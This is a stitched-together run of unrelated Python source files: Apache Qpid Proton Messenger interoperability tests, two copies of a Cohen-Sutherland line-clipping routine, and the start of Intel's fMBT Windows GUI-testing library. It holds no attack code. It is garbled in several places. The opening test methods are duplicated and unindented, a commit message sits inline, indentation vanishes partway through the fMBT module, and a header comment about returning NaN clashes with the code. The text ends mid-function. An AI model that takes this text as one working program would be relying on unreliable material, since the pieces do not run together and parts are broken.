self._do_oneway_test(MessengerReceiverC(), MessengerSenderC(), "amqps")
def test_oneway_valgrind(self):
self.valgrind_test()
self._do_oneway_test(MessengerReceiverValgrind(), MessengerSenderValgrind())
def test_oneway_Python(self):
self._do_oneway_test(MessengerReceiverPython(), MessengerSenderPython())
def test_oneway_C_Python(self):
self._do_oneway_test(MessengerReceiverC(), MessengerSenderPython())
def test_oneway_Python_C(self):
self._do_oneway_test(MessengerReceiverPython(), MessengerSenderC())
def test_echo_C(self):
self._do_echo_test(MessengerReceiverC(), MessengerSenderC())
def test_echo_C_SSL(self):
self._ssl_check()
self._do_echo_test(MessengerReceiverC(), MessengerSenderC(), "amqps")
def test_echo_valgrind(self):
self.valgrind_test()
self._do_echo_test(MessengerReceiverValgrind(), MessengerSenderValgrind())
def test_echo_Python(self):
self._do_echo_test(MessengerReceiverPython(), MessengerSenderPython())
def test_echo_C_Python(self):
self._do_echo_test(MessengerReceiverC(), MessengerSenderPython())
def test_echo_Python_C(self):
self._do_echo_test(MessengerReceiverPython(), MessengerSenderC())
def test_relay_C(self):
self._do_relay_test(MessengerReceiverC(), MessengerReceiverC(), MessengerSenderC())
def test_relay_C_SSL(self):
self._ssl_check()
self._do_relay_test(MessengerReceiverC(), MessengerReceiverC(), MessengerSenderC(), "amqps")
def test_relay_valgrind(self):
self.valgrind_test()
self._do_relay_test(MessengerReceiverValgrind(), MessengerReceiverValgrind(), MessengerSenderValgrind())
def test_relay_C_Python(self):
self._do_relay_test(MessengerReceiverC(), MessengerReceiverPython(), MessengerSenderPython())
def test_relay_Python(self):
self._do_relay_test(MessengerReceiverPython(), MessengerReceiverPython(), MessengerSenderPython())
def test_star_topology_C(self):
self._do_star_topology_test( MessengerReceiverC, MessengerSenderC )
def test_star_topology_C_SSL(self):
self._ssl_check()
self._do_star_topology_test( MessengerReceiverC, MessengerSenderC, "amqps" )
def test_star_topology_valgrind(self):
self.valgrind_test()
self._do_star_topology_test( MessengerReceiverValgrind, MessengerSenderValgrind )
def test_star_topology_Python(self):
self._do_star_topology_test( MessengerReceiverPython, MessengerSenderPython )
def test_star_topology_Python_C(self):
self._do_star_topology_test( MessengerReceiverPython, MessengerSenderC )
def test_star_topology_C_Python(self):
    # BUGFIX: this test was an exact duplicate of
    # test_star_topology_Python_C (Python receiver + C senders), so the
    # C-receiver/Python-sender pairing was never exercised. The naming
    # convention elsewhere in this class (e.g. test_oneway_C_Python) is
    # <receiver>_<sender>.
    self._do_star_topology_test( MessengerReceiverC, MessengerSenderPython )
NO-JIRA: bump up the default parameters to the valgrind tests for better code coverage.
git-svn-id: 33ed6c3feaacb64944efc691d1ae8e09b17f2bf9@1581989 13f79535-47bb-0310-9956-ffa450edef68
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import os
import sys
from common import Test, Skipped, free_tcp_ports, \
MessengerReceiverC, MessengerSenderC, \
MessengerReceiverValgrind, MessengerSenderValgrind, \
MessengerReceiverPython, MessengerSenderPython, \
isSSLPresent
from proton import *
#
# Tests that run the apps
#
class AppTests(Test):
    """Base class for tests that drive external sender/receiver apps.

    Tracks the sender and receiver process wrappers created by a test,
    provides workload-sizing parameters (optionally reduced for "fast"
    or valgrind-instrumented runs), and a generic start/wait/check
    driver (_do_test).
    """
    def __init__(self, *args):
        Test.__init__(self, *args)
        # Set by valgrind_test(); selects the valgrind= defaults below.
        self.is_valgrind = False
    def default(self, name, value, **kwargs):
        """Like Test.default, but prefers the 'valgrind' keyword value
        when this test has been marked as a valgrind run."""
        if self.is_valgrind:
            default = kwargs.get("valgrind", value)
        else:
            default = value
        return Test.default(self, name, default, **kwargs)
    # Workload-sizing knobs. Each may be overridden per run mode via the
    # fast=/valgrind= keyword defaults.
    @property
    def iterations(self):
        return int(self.default("iterations", 2, fast=1, valgrind=2))
    @property
    def send_count(self):
        return int(self.default("send_count", 17, fast=1, valgrind=2))
    @property
    def target_count(self):
        return int(self.default("target_count", 5, fast=1, valgrind=2))
    @property
    def send_batch(self):
        return int(self.default("send_batch", 7, fast=1, valgrind=2))
    @property
    def forward_count(self):
        return int(self.default("forward_count", 5, fast=1, valgrind=2))
    @property
    def port_count(self):
        return int(self.default("port_count", 3, fast=1, valgrind=2))
    @property
    def sender_count(self):
        return int(self.default("sender_count", 3, fast=1, valgrind=2))
    def valgrind_test(self):
        # Mark this test as running under valgrind (smaller workloads).
        self.is_valgrind = True
    def setup(self):
        self.senders = []
        self.receivers = []
    def teardown(self):
        pass
    def _do_test(self, iterations=1):
        """Start all receivers, run every sender `iterations` times, then
        verify that every process exited with status 0."""
        verbose = self.verbose
        for R in self.receivers:
            R.start( verbose )
        for j in range(iterations):
            for S in self.senders:
                S.start( verbose )
            for S in self.senders:
                S.wait()
                #print("SENDER OUTPUT:")
                #print( S.stdout() )
                assert S.status() == 0, ("Command '%s' failed status=%d: '%s' '%s'"
                                         % (str(S.cmdline()),
                                            S.status(),
                                            S.stdout(),
                                            S.stderr()))
        for R in self.receivers:
            R.wait()
            #print("RECEIVER OUTPUT")
            #print( R.stdout() )
            assert R.status() == 0, ("Command '%s' failed status=%d: '%s' '%s'"
                                     % (str(R.cmdline()),
                                        R.status(),
                                        R.stdout(),
                                        R.stderr()))
#
# Traffic passing tests based on the Messenger apps
#
class MessengerTests(AppTests):
    """Traffic-passing tests built on the Messenger example apps.

    Pairs the C and Python sender/receiver implementations (optionally
    under valgrind or over SSL) in one-way, echo, relay and star
    topologies.
    """
    # Seconds; applied to every sender/receiver process.
    _timeout = 60
    def _ssl_check(self):
        # Skip SSL variants when proton was built without SSL support.
        if not isSSLPresent():
            raise Skipped("No SSL libraries found.")
    def __init__(self, *args):
        AppTests.__init__(self, *args)
    def _do_oneway_test(self, receiver, sender, domain="amqp"):
        """ Send N messages to a receiver.
        Parameters:
          iterations - repeat the senders this many times
          target_count - # of targets to send to
          send_count - # messages sent to each target
        """
        iterations = self.iterations
        send_count = self.send_count
        target_count = self.target_count
        send_total = send_count * target_count
        receive_total = send_total * iterations
        port = free_tcp_ports()[0]
        # "~" in the address marks a subscription the receiver binds/listens on.
        receiver.subscriptions = ["%s://~0.0.0.0:%s" % (domain, port)]
        receiver.receive_count = receive_total
        receiver.timeout = MessengerTests._timeout
        self.receivers.append( receiver )
        sender.targets = ["%s://0.0.0.0:%s/X%d" % (domain, port, j) for j in range(target_count)]
        sender.send_count = send_total
        sender.timeout = MessengerTests._timeout
        self.senders.append( sender )
        self._do_test(iterations)
    def _do_echo_test(self, receiver, sender, domain="amqp"):
        """ Send N messages to a receiver, which responds to each.
        Parameters:
          iterations - repeat the senders this many times
          target_count - # targets to send to
          send_count - # messages sent to each target
          send_batch - wait for replies after this many messages sent
        """
        iterations = self.iterations
        send_count = self.send_count
        target_count = self.target_count
        send_batch = self.send_batch
        send_total = send_count * target_count
        receive_total = send_total * iterations
        port = free_tcp_ports()[0]
        receiver.subscriptions = ["%s://~0.0.0.0:%s" % (domain, port)]
        receiver.receive_count = receive_total
        receiver.send_reply = True
        receiver.timeout = MessengerTests._timeout
        self.receivers.append( receiver )
        sender.targets = ["%s://0.0.0.0:%s/%dY" % (domain, port, j) for j in range(target_count)]
        sender.send_count = send_total
        sender.get_reply = True
        sender.send_batch = send_batch
        sender.timeout = MessengerTests._timeout
        self.senders.append( sender )
        self._do_test(iterations)
    def _do_relay_test(self, receiver, relay, sender, domain="amqp"):
        """ Send N messages to a receiver, which replies to each and forwards
        each of them to a different receiver.
        Parameters:
          iterations - repeat the senders this many times
          target_count - # targets to send to
          send_count - # messages sent to each target
          send_batch - wait for replies after this many messages sent
          forward_count - forward to this many targets
        """
        iterations = self.iterations
        send_count = self.send_count
        target_count = self.target_count
        send_batch = self.send_batch
        forward_count = self.forward_count
        send_total = send_count * target_count
        receive_total = send_total * iterations
        port = free_tcp_ports()[0]
        receiver.subscriptions = ["%s://~0.0.0.0:%s" % (domain, port)]
        receiver.receive_count = receive_total
        receiver.send_reply = True
        # forward to 'relay' - uses two links
        # ## THIS FAILS:
        # receiver.forwards = ["amqp://Relay/%d" % j for j in range(forward_count)]
        receiver.forwards = ["%s://Relay" % domain]
        receiver.timeout = MessengerTests._timeout
        self.receivers.append( receiver )
        # The relay connects out to the receiver's port (no "~": it does
        # not listen itself) and identifies itself by name.
        relay.subscriptions = ["%s://0.0.0.0:%s" % (domain, port)]
        relay.name = "Relay"
        relay.receive_count = receive_total
        relay.timeout = MessengerTests._timeout
        self.receivers.append( relay )
        # send to 'receiver'
        sender.targets = ["%s://0.0.0.0:%s/X%dY" % (domain, port, j) for j in range(target_count)]
        sender.send_count = send_total
        sender.get_reply = True
        sender.timeout = MessengerTests._timeout
        self.senders.append( sender )
        self._do_test(iterations)
    def _do_star_topology_test(self, r_factory, s_factory, domain="amqp"):
        """
        A star-like topology, with a central receiver at the hub, and senders at
        the spokes. Each sender will connect to each of the ports the receiver is
        listening on. Each sender will then create N links per each connection.
        Each sender will send X messages per link, waiting for a response.
        Parameters:
          iterations - repeat the senders this many times
          port_count - # of ports the receiver will listen on. Each sender connects
                       to all ports.
          sender_count - # of senders
          target_count - # of targets per connection
          send_count - # of messages sent to each target
          send_batch - # of messages to send before waiting for response
        """
        iterations = self.iterations
        port_count = self.port_count
        sender_count = self.sender_count
        target_count = self.target_count
        send_count = self.send_count
        send_batch = self.send_batch
        # Each sender transmits send_count messages to every (port, target) pair.
        send_total = port_count * target_count * send_count
        # The hub receives all traffic from every sender on every iteration.
        receive_total = send_total * sender_count * iterations
        ports = free_tcp_ports(port_count)
        receiver = r_factory()
        receiver.subscriptions = ["%s://~0.0.0.0:%s" % (domain, port) for port in ports]
        receiver.receive_count = receive_total
        receiver.send_reply = True
        receiver.timeout = MessengerTests._timeout
        self.receivers.append( receiver )
        for i in range(sender_count):
            sender = s_factory()
            sender.targets = ["%s://0.0.0.0:%s/%d" % (domain, port, j) for port in ports for j in range(target_count)]
            sender.send_count = send_total
            sender.send_batch = send_batch
            sender.get_reply = True
            sender.timeout = MessengerTests._timeout
            self.senders.append( sender )
        self._do_test(iterations)
    # Test method names follow the <receiver(s)>_<sender> convention.
    def test_oneway_C(self):
        self._do_oneway_test(MessengerReceiverC(), MessengerSenderC())
    def test_oneway_C_SSL(self):
        self._ssl_check()
        self._do_oneway_test(MessengerReceiverC(), MessengerSenderC(), "amqps")
    def test_oneway_valgrind(self):
        self.valgrind_test()
        self._do_oneway_test(MessengerReceiverValgrind(), MessengerSenderValgrind())
    def test_oneway_Python(self):
        self._do_oneway_test(MessengerReceiverPython(), MessengerSenderPython())
    def test_oneway_C_Python(self):
        self._do_oneway_test(MessengerReceiverC(), MessengerSenderPython())
    def test_oneway_Python_C(self):
        self._do_oneway_test(MessengerReceiverPython(), MessengerSenderC())
    def test_echo_C(self):
        self._do_echo_test(MessengerReceiverC(), MessengerSenderC())
    def test_echo_C_SSL(self):
        self._ssl_check()
        self._do_echo_test(MessengerReceiverC(), MessengerSenderC(), "amqps")
    def test_echo_valgrind(self):
        self.valgrind_test()
        self._do_echo_test(MessengerReceiverValgrind(), MessengerSenderValgrind())
    def test_echo_Python(self):
        self._do_echo_test(MessengerReceiverPython(), MessengerSenderPython())
    def test_echo_C_Python(self):
        self._do_echo_test(MessengerReceiverC(), MessengerSenderPython())
    def test_echo_Python_C(self):
        self._do_echo_test(MessengerReceiverPython(), MessengerSenderC())
    def test_relay_C(self):
        self._do_relay_test(MessengerReceiverC(), MessengerReceiverC(), MessengerSenderC())
    def test_relay_C_SSL(self):
        self._ssl_check()
        self._do_relay_test(MessengerReceiverC(), MessengerReceiverC(), MessengerSenderC(), "amqps")
    def test_relay_valgrind(self):
        self.valgrind_test()
        self._do_relay_test(MessengerReceiverValgrind(), MessengerReceiverValgrind(), MessengerSenderValgrind())
    def test_relay_C_Python(self):
        self._do_relay_test(MessengerReceiverC(), MessengerReceiverPython(), MessengerSenderPython())
    def test_relay_Python(self):
        self._do_relay_test(MessengerReceiverPython(), MessengerReceiverPython(), MessengerSenderPython())
    def test_star_topology_C(self):
        self._do_star_topology_test( MessengerReceiverC, MessengerSenderC )
    def test_star_topology_C_SSL(self):
        self._ssl_check()
        self._do_star_topology_test( MessengerReceiverC, MessengerSenderC, "amqps" )
    def test_star_topology_valgrind(self):
        self.valgrind_test()
        self._do_star_topology_test( MessengerReceiverValgrind, MessengerSenderValgrind )
    def test_star_topology_Python(self):
        self._do_star_topology_test( MessengerReceiverPython, MessengerSenderPython )
    def test_star_topology_Python_C(self):
        self._do_star_topology_test( MessengerReceiverPython, MessengerSenderC )
    def test_star_topology_C_Python(self):
        # BUGFIX: was a duplicate of test_star_topology_Python_C; now
        # actually pairs a C receiver hub with Python senders.
        self._do_star_topology_test( MessengerReceiverC, MessengerSenderPython )
|
# -*- coding: utf-8 -*-
from __future__ import division
'''
forked from https://bitbucket.org/marcusva/py-sdl2 (which has public-domain license)
The MIT License (MIT)
Copyright (c) 2014 Michael Hirsch
reference: http://en.wikipedia.org/wiki/Cohen%E2%80%93Sutherland_algorithm
I have corrected errors in the cohensutherland code and compared cohensutherland with Matlab polyxpoly() results.
'''
def cohensutherland(xmin, ymax, xmax, ymin, x1, y1, x2, y2):
    """Clip the segment (x1, y1)-(x2, y2) to an axis-aligned rectangle.

    The clip window is given by xmin, ymax, xmax, ymin. Implements the
    Cohen-Sutherland algorithm: each endpoint is classified with a 4-bit
    outcode and the segment is repeatedly shortened at window borders.

    Returns the clipped endpoints (cx1, cy1, cx2, cy2), or four None
    values when the segment lies entirely outside the window.
    """
    INSIDE, LEFT, RIGHT, LOWER, UPPER = 0, 1, 2, 4, 8

    def outcode(px, py):
        # Classify a point against the four window borders.
        code = INSIDE
        if px < xmin:
            code |= LEFT
        elif px > xmax:
            code |= RIGHT
        if py < ymin:
            code |= LOWER
        elif py > ymax:
            code |= UPPER
        return code

    code1 = outcode(x1, y1)
    code2 = outcode(x2, y2)

    # Loop until both endpoints are inside (trivial accept, codes 0|0)
    # or the segment is proven entirely outside (trivial reject).
    while code1 | code2:
        if code1 & code2:
            # Both endpoints share an outside half-plane: no intersection.
            return None, None, None, None
        # Pick an endpoint that lies outside the window. This is the
        # logical "or" (short-circuits to the first non-zero code),
        # not a bitwise operation.
        out = code1 or code2
        if out & UPPER:
            nx = x1 + (x2 - x1) * (ymax - y1) / (y2 - y1)
            ny = ymax
        elif out & LOWER:
            nx = x1 + (x2 - x1) * (ymin - y1) / (y2 - y1)
            ny = ymin
        elif out & RIGHT:
            ny = y1 + (y2 - y1) * (xmax - x1) / (x2 - x1)
            nx = xmax
        elif out & LEFT:
            ny = y1 + (y2 - y1) * (xmin - x1) / (x2 - x1)
            nx = xmin
        else:
            raise RuntimeError('Undefined clipping state')
        # Replace the chosen endpoint with the border intersection and
        # re-classify it.
        if out == code1:
            x1, y1 = nx, ny
            code1 = outcode(x1, y1)
        else:
            x2, y2 = nx, ny
            code2 = outcode(x2, y2)
    return x1, y1, x2, y2
if __name__ == '__main__': #test case
    from numpy.testing import assert_array_almost_equal
    '''
    make box with corners LL/UR (1,3) (4,5)
    and line segment with ends (0,0) (4,6)
    '''
    # Expected clipped segment: (2, 3) - (10/3, 5).
    x1, y1, x2, y2 = cohensutherland(1, 5, 4, 3,
                                     0, 0, 4, 6)
    assert_array_almost_equal([x1,y1,x2,y2],[2,3,3.3333333333333,5])
numba test
#!/usr/bin/env python3
from __future__ import division
#nan = float('nan')
#from numba import jit
'''
forked from https://bitbucket.org/marcusva/py-sdl2 (which has public-domain license)
The MIT License (MIT)
Copyright (c) 2014 Michael Hirsch
Nov 2014: returning NaN instead of None for Numba compatibility
(Numba 0.15.1 can't do "is not None")
reference: http://en.wikipedia.org/wiki/Cohen%E2%80%93Sutherland_algorithm
I have corrected errors in the cohensutherland code and compared cohensutherland with Matlab polyxpoly() results.
'''
#@jit
def cohensutherland(xmin, ymax, xmax, ymin, x1, y1, x2, y2):
    """Cohen-Sutherland clipping of segment (x1, y1)-(x2, y2).

    The clip window is described by xmin, ymax, xmax, ymin. Endpoints
    are labeled with 4-bit region codes and the segment is trimmed at
    window borders until it is trivially accepted or rejected.

    Returns (cx1, cy1, cx2, cy2), or (None, None, None, None) when the
    segment does not intersect the window.
    """
    _INSIDE, _LEFT, _RIGHT, _LOW, _UP = 0, 1, 2, 4, 8

    def region(px, py):
        # 4-bit region code of a point relative to the window.
        r = _INSIDE
        if px < xmin:
            r |= _LEFT
        elif px > xmax:
            r |= _RIGHT
        if py < ymin:
            r |= _LOW
        elif py > ymax:
            r |= _UP
        return r

    r1 = region(x1, y1)
    r2 = region(x2, y2)
    while r1 | r2:  # both zero means the whole segment is inside: accept
        if r1 & r2:
            # Endpoints share an outside half-plane: trivially reject.
            return None, None, None, None
        # Word "or" (not bitwise): pick the first non-zero region code.
        rout = r1 or r2
        if rout & _UP:
            px, py = x1 + (x2 - x1) * (ymax - y1) / (y2 - y1), ymax
        elif rout & _LOW:
            px, py = x1 + (x2 - x1) * (ymin - y1) / (y2 - y1), ymin
        elif rout & _RIGHT:
            px, py = xmax, y1 + (y2 - y1) * (xmax - x1) / (x2 - x1)
        elif rout & _LEFT:
            px, py = xmin, y1 + (y2 - y1) * (xmin - x1) / (x2 - x1)
        else:
            raise RuntimeError('Undefined clipping state')
        # Move the outside endpoint onto the border and re-classify it.
        if rout == r1:
            x1, y1 = px, py
            r1 = region(x1, y1)
        else:
            x2, y2 = px, py
            r2 = region(x2, y2)
    return x1, y1, x2, y2
if __name__ == '__main__': #test case
    from numpy.testing import assert_array_almost_equal
    '''
    make box with corners LL/UR (1,3) (4,5)
    and line segment with ends (0,0) (4,6)
    '''
    # Expected clipped segment: (2, 3) - (10/3, 5).
    x1, y1, x2, y2 = cohensutherland(1, 5, 4, 3,
                                     0, 0, 4, 6)
    assert_array_almost_equal([x1,y1,x2,y2],[2,3,3.3333333333333,5])
|
# fMBT, free Model Based Testing tool
# Copyright (c) 2014, Intel Corporation.
#
# This program is free software; you can redistribute it and/or modify it
# under the terms and conditions of the GNU Lesser General Public License,
# version 2.1, as published by the Free Software Foundation.
#
# This program is distributed in the hope it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin St - Fifth Floor, Boston, MA 02110-1301 USA.
"""
This is library implements fMBT GUITestInterface for Windows
How to setup Windows device under test
1. Install Python 2.X. (For example 2.7.)
2. Add Python to PATH, so that command "python" starts the interpreter.
3. Copy fMBT's pythonshare directory to Windows.
4. In the pythonshare directory, run "python setup.py install"
5. Run:
cd \\python27\\scripts
python pythonshare-server --interface=all --password=xxxxxxxx
How to connect to the device
import fmbtwindows
d = fmbtwindows.Device("IP-ADDRESS-OF-THE-DEVICE", password="xxxxxxxx")
"""
import ast
import base64
import fmbt
import fmbt_config
import fmbtgti
import inspect
import math
import os
import pythonshare
import shutil
import subprocess
import time
import zlib
# Optional dependencies: degrade gracefully to None when unavailable.
try:
    import pycosh
except ImportError:
    pycosh = None
try:
    import fmbtpng
except ImportError:
    fmbtpng = None
# NOTE(review): close_fds is disabled on native Windows — presumably
# because Python 2's subprocess cannot combine close_fds=True with
# redirected stdout/stderr there; confirm against _run() usage.
if os.name == "nt":
    _g_closeFds = False
else:
    _g_closeFds = True
def _adapterLog(msg):
    """Write msg to the fMBT adapter log, prefixed with this module's name."""
    fmbt.adapterlog("fmbtwindows %s" % (msg,))
def _run(command, expectedExitStatus=None):
    """
    Execute command in child process, return status, stdout, stderr.

    A string command is run through the shell; a list is exec'd
    directly. When expectedExitStatus is None the child is started but
    not waited for. Raises FMBTWindowsError when the exit status does
    not match the expectation.
    """
    if type(command) == str:
        shell = True
    else:
        shell = False
    try:
        p = subprocess.Popen(command, shell=shell,
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE,
                             close_fds=_g_closeFds)
        if expectedExitStatus != None:
            # Caller cares about the outcome: wait and collect output.
            out, err = p.communicate()
        else:
            out, err = ('', None)
    except Exception, e:  # Python 2 syntax; this module targets Python 2.X
        # Launching failed: fabricate a process-like object with a
        # shell-style "command not found" status.
        class fakeProcess(object): pass
        p = fakeProcess
        p.returncode = 127
        out, err = ('', e)
    exitStatus = p.returncode
    # NOTE(review): the "not in" test assumes expectedExitStatus is a
    # sequence; passing a plain int that differs from the real status
    # would raise TypeError here — confirm intended usage.
    if (expectedExitStatus != None and
        exitStatus != expectedExitStatus and
        exitStatus not in expectedExitStatus):
        msg = "Executing %s failed. Exit status: %s, expected %s" % (
            command, exitStatus, expectedExitStatus)
        _adapterLog("%s\n stdout: %s\n stderr: %s\n" % (msg, out, err))
        raise FMBTWindowsError(msg)
    return exitStatus, out, err
_g_keyNames = [
"VK_LBUTTON", "VK_RBUTTON", "VK_CANCEL", "VK_MBUTTON",
"VK_XBUTTON1", "VK_XBUTTON2", "VK_BACK", "VK_TAB", "VK_CLEAR",
"VK_RETURN", "VK_SHIFT", "VK_CONTROL", "VK_MENU", "VK_PAUSE",
"VK_CAPITAL", "VK_KANA", "VK_HANGUL", "VK_JUNJA", "VK_FINAL",
"VK_HANJA", "VK_KANJI", "VK_ESCAPE", "VK_CONVERT", "VK_NONCONVERT",
"VK_ACCEPT", "VK_MODECHANGE", "VK_SPACE", "VK_PRIOR", "VK_NEXT",
"VK_END", "VK_HOME", "VK_LEFT", "VK_UP", "VK_RIGHT", "VK_DOWN",
"VK_SELECT", "VK_PRINT", "VK_EXECUTE", "VK_SNAPSHOT", "VK_INSERT",
"VK_DELETE", "VK_HELP", "VK_LWIN", "VK_RWIN", "VK_APPS", "VK_SLEEP",
"VK_NUMPAD0", "VK_NUMPAD1", "VK_NUMPAD2", "VK_NUMPAD3", "VK_NUMPAD4",
"VK_NUMPAD5", "VK_NUMPAD6", "VK_NUMPAD7", "VK_NUMPAD8", "VK_NUMPAD9",
"VK_MULTIPLY", "VK_ADD", "VK_SEPARATOR", "VK_SUBTRACT", "VK_DECIMAL",
"VK_DIVIDE", "VK_F1", "VK_F2", "VK_F3", "VK_F4", "VK_F5", "VK_F6",
"VK_F7", "VK_F8", "VK_F9", "VK_F10", "VK_F11", "VK_F12", "VK_F13",
"VK_F14", "VK_F15", "VK_F16", "VK_F17", "VK_F18", "VK_F19", "VK_F20",
"VK_F21", "VK_F22", "VK_F23", "VK_F24", "VK_NUMLOCK", "VK_SCROLL",
"VK_LSHIFT", "VK_RSHIFT", "VK_LCONTROL", "VK_RCONTROL", "VK_LMENU",
"VK_RMENU", "VK_BROWSER_BACK", "VK_BROWSER_FORWARD",
"VK_BROWSER_REFRESH", "VK_BROWSER_STOP", "VK_BROWSER_SEARCH",
"VK_BROWSER_FAVORITES", "VK_BROWSER_HOME", "VK_VOLUME_MUTE",
"VK_VOLUME_DOWN", "VK_VOLUME_UP", "VK_MEDIA_NEXT_TRACK",
"VK_MEDIA_PREV_TRACK", "VK_MEDIA_STOP", "VK_MEDIA_PLAY_PAUSE",
"VK_LAUNCH_MAIL", "VK_LAUNCH_MEDIA_SELECT", "VK_LAUNCH_APP1",
"VK_LAUNCH_APP2", "VK_OEM_1", "VK_OEM_PLUS", "VK_OEM_COMMA",
"VK_OEM_MINUS", "VK_OEM_PERIOD", "VK_OEM_2", "VK_OEM_3", "VK_OEM_4",
"VK_OEM_5", "VK_OEM_6", "VK_OEM_7", "VK_OEM_8", "VK_OEM_102",
"VK_PROCESSKEY", "VK_PACKET", "VK_ATTN", "VK_CRSEL", "VK_EXSEL",
"VK_EREOF", "VK_PLAY", "VK_ZOOM", "VK_PA1", "VK_OEM_CLEAR", "0", "1",
"2", "3", "4", "5", "6", "7", "8", "9", "A", "B", "C", "D", "E", "F",
"G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T",
"U", "V", "W", "X", "Y", "Z"]
# Identifiers of the supported view-dump backends; the default view
# source used by Device is _g_viewSources[1] ("uiautomation").
_g_viewSources = ["enumchildwindows", "uiautomation",
                  "uiautomation/raw", "uiautomation/control",
                  "uiautomation/content"]
# ShowWindow showCmd
# Values for the showCmd argument of the Windows ShowWindow API.
SW_HIDE = 0
SW_NORMAL = 1
SW_MINIMIZED = 2
SW_MAXIMIZE = 3
SW_NOACTIVATE = 4
SW_SHOW = 5
SW_MINIMIZE = 6
SW_MINNOACTIVE = 7
SW_SHOWNA = 8
SW_RESTORE = 9
SW_DEFAULT = 10
SW_FORCEMINIMIZE = 11
# Convenience re-export of the generic GUI item sorter.
sortItems = fmbtgti.sortItems
class ViewItem(fmbtgti.GUIItem):
    """A single widget/window inside a View dump.

    Wraps the raw item data: id, parent id, class name, text, bounding
    box and — for uiautomation dumps — all raw properties.
    """
    def __init__(self, view, itemId, parentId, className, text, bbox, dumpFilename,
                 rawProperties=None):
        self._view = view
        self._itemId = itemId
        self._parentId = parentId
        self._className = className
        self._text = text
        if rawProperties:
            self._properties = rawProperties
        else:
            self._properties = {}
        fmbtgti.GUIItem.__init__(self, self._className, bbox, dumpFilename)
    def branch(self):
        """Returns list of view items from the root down to this item
        Note: works only for UIAutomation backend"""
        if not self._view._viewSource.startswith("uiautomation"):
            raise NotImplementedError(
                "branch() works only for uiautomation at the moment")
        rv = []
        itemId = self._itemId
        # Walk the parent links up to the root, then reverse so the
        # result is ordered root -> ... -> this item.
        while itemId:
            rv.append(self._view._viewItems[itemId])
            if itemId in self._view._viewItems:
                itemId = self._view._viewItems[itemId]._parentId
            else:
                itemId = None
        rv.reverse()
        return rv
    def children(self):
        """Return the direct child items of this item."""
        if self._view._viewSource.startswith("enumchildwindows"):
            return [self._view._viewItems[winfo[0]]
                    for winfo in self._view._itemTree[self._itemId]]
        else:
            # uiautomation items are stored flat: scan all items for
            # those whose parent id matches ours.
            items = self._view._viewItems
            return [items[itemHash]
                    for itemHash in items
                    if items[itemHash]._parentId == self._itemId]
    def parent(self):
        """Return the parent item's id (0 marks the root in uiautomation dumps)."""
        return self._parentId
    def parentItem(self):
        """Return the parent ViewItem, or None when it is not in the view."""
        try:
            return self._view._viewItems[self._parentId]
        except KeyError:
            return None
    def id(self):
        return self._itemId
    def properties(self):
        return self._properties
    def text(self):
        return self._text
    def dumpProperties(self):
        """Return all raw properties as sorted "key=value" lines."""
        rv = []
        if self._properties:
            for key in sorted(self._properties.keys()):
                rv.append("%s=%s" % (key, self._properties[key]))
        return "\n".join(rv)
    def __str__(self):
        return "ViewItem(%s)" % (self._view._dumpItem(self),)
class View(object):
def __init__(self, dumpFilename, itemTree, itemOnScreen=None):
self._dumpFilename = dumpFilename
self._itemTree = itemTree
self._rootItem = None
self._viewItems = {}
if itemOnScreen == None:
self._itemOnScreen = lambda item: True
else:
self._itemOnScreen = itemOnScreen
if isinstance(itemTree, dict):
# data from enumchildwindows:
self._viewSource = "enumchildwindows"
for itemId, winfoList in itemTree.iteritems():
for winfo in winfoList:
itemId, parentId, className, text, bbox = winfo
self._viewItems[itemId] = ViewItem(
self, itemId, parentId, className, text, bbox, dumpFilename)
self._rootItem = self._viewItems[self._itemTree["root"][0][0]]
elif isinstance(itemTree, list):
# data from uiautomation
# list of dictionaries, each of which contains properties of an item
self._viewSource = "uiautomation"
for elt in itemTree:
bboxString = elt.get("BoundingRectangle", "0;0;0;0")
if ";" in bboxString:
bboxSeparator = ";"
else:
bboxSeparator = ","
try:
bbox = [int(coord) for coord in bboxString.split(bboxSeparator)]
bbox[2] = bbox[0] + bbox[2] # width to right
bbox[3] = bbox[1] + bbox[3] # height to bottom
bbox = tuple(bbox)
except Exception, e:
bbox = (0, 0, 0, 0)
text = elt.get("Value", "")
if text == "":
text = elt.get("Name", "")
vi = ViewItem(
self, int(elt["hash"]), int(elt["parent"]),
elt.get("ClassName", ""),
text,
bbox,
dumpFilename,
elt)
self._viewItems[int(elt["hash"])] = vi
if vi.parent() == 0:
self._rootItem = vi
if not self._rootItem:
raise ValueError("no root item in view data")
def _intCoords(self, *args):
# TODO: relative coordinates like (0.5, 0.9)
return [int(c) for c in args[0]]
def filename(self):
return self._dumpFilename
def rootItem(self):
return self._rootItem
def _dumpItem(self, viewItem):
return "id=%s cls=%s text=%s bbox=%s" % (
viewItem._itemId, repr(viewItem._className), repr(viewItem._text),
viewItem._bbox)
def _dumpTree(self, rootItem, depth=0):
l = ["%s%s" % (" " * (depth * 4), self._dumpItem(rootItem))]
for child in rootItem.children():
l.extend(self._dumpTree(child, depth+1))
return l
def dumpTree(self, rootItem=None):
"""
Returns item tree as a string
"""
if rootItem == None:
rootItem = self.rootItem()
return "\n".join(self._dumpTree(rootItem))
def __str__(self):
return "View(%s, %s items)" % (repr(self._dumpFilename), len(self._viewItems))
def findItems(self, comparator, count=-1, searchRootItem=None, searchItems=None, onScreen=False):
foundItems = []
if count == 0: return foundItems
if searchRootItem != None:
if comparator(searchRootItem) and (
not onScreen or (self._itemOnScreen(searchRootItem))):
foundItems.append(searchRootItem)
for c in searchRootItem.children():
foundItems.extend(self.findItems(comparator, count=count-len(foundItems), searchRootItem=c, onScreen=onScreen))
else:
if searchItems:
domain = iter(searchItems)
else:
domain = self._viewItems.itervalues
for i in domain():
